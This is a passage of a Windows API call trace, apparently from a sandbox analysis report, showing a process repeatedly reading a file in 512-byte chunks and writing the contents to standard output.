lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.695] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.695] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.695] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.695] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] GetFileType (hFile=0x50) returned 0x1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] GetFileType (hFile=0x50) returned 0x1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] GetFileType (hFile=0x50) returned 0x1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] GetFileType (hFile=0x50) returned 0x1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] GetFileType 
(hFile=0x50) returned 0x1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] GetFileType (hFile=0x50) returned 0x1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] GetFileType (hFile=0x50) returned 0x1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] GetFileType (hFile=0x50) returned 0x1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.697] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.697] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.697] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.697] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.697] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] GetFileType (hFile=0x50) returned 0x1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] GetFileType (hFile=0x50) returned 0x1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] GetFileType (hFile=0x50) returned 0x1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] GetFileType (hFile=0x50) returned 0x1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] GetFileType (hFile=0x50) returned 0x1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] GetFileType (hFile=0x50) returned 0x1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, 
lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] GetFileType (hFile=0x50) returned 0x1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] GetFileType (hFile=0x50) returned 0x1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.699] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.699] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.699] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.699] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] GetFileType (hFile=0x50) returned 0x1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] GetFileType (hFile=0x50) returned 0x1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] GetFileType (hFile=0x50) returned 0x1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 
[0227.699] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] GetFileType (hFile=0x50) returned 0x1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] GetFileType (hFile=0x50) returned 0x1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] GetFileType (hFile=0x50) returned 0x1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] GetFileType (hFile=0x50) returned 0x1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] GetFileType (hFile=0x50) returned 0x1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] WriteFile (in: hFile=0x50, 
lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.700] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.700] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.700] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.700] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] GetFileType (hFile=0x50) returned 0x1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] GetFileType (hFile=0x50) returned 0x1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] GetFileType (hFile=0x50) returned 0x1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] GetFileType (hFile=0x50) returned 0x1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.701] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0227.701] GetFileType (hFile=0x50) returned 0x1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] GetFileType (hFile=0x50) returned 0x1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] GetFileType (hFile=0x50) returned 0x1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] GetFileType (hFile=0x50) returned 0x1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.702] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.702] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.702] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.702] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, 
lpOverlapped=0x0) returned 1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] GetFileType (hFile=0x50) returned 0x1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] GetFileType (hFile=0x50) returned 0x1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] GetFileType (hFile=0x50) returned 0x1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] GetFileType (hFile=0x50) returned 0x1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] GetFileType (hFile=0x50) returned 0x1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] GetFileType (hFile=0x50) returned 0x1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 
| out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] GetFileType (hFile=0x50) returned 0x1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] GetFileType (hFile=0x50) returned 0x1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.703] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.703] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.703] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.703] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] GetFileType (hFile=0x50) returned 0x1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] GetFileType (hFile=0x50) returned 0x1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] GetFileType (hFile=0x50) returned 0x1 [0227.704] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0227.704] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] GetFileType (hFile=0x50) returned 0x1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] GetFileType (hFile=0x50) returned 0x1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] GetFileType (hFile=0x50) returned 0x1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] GetFileType (hFile=0x50) returned 0x1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] GetFileType (hFile=0x50) returned 0x1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 
[0227.705] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.705] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.705] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.705] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.705] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] GetFileType (hFile=0x50) returned 0x1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] GetFileType (hFile=0x50) returned 0x1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] GetFileType (hFile=0x50) returned 0x1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] GetFileType (hFile=0x50) returned 0x1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 
[0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] GetFileType (hFile=0x50) returned 0x1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] GetFileType (hFile=0x50) returned 0x1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] GetFileType (hFile=0x50) returned 0x1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] GetFileType (hFile=0x50) returned 0x1 [0227.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.741] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.741] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.741] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.741] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.741] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, 
lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.741] GetFileType (hFile=0x50) returned 0x1 [0227.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.741] GetFileType (hFile=0x50) returned 0x1 [0227.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.741] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] GetFileType (hFile=0x50) returned 0x1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, 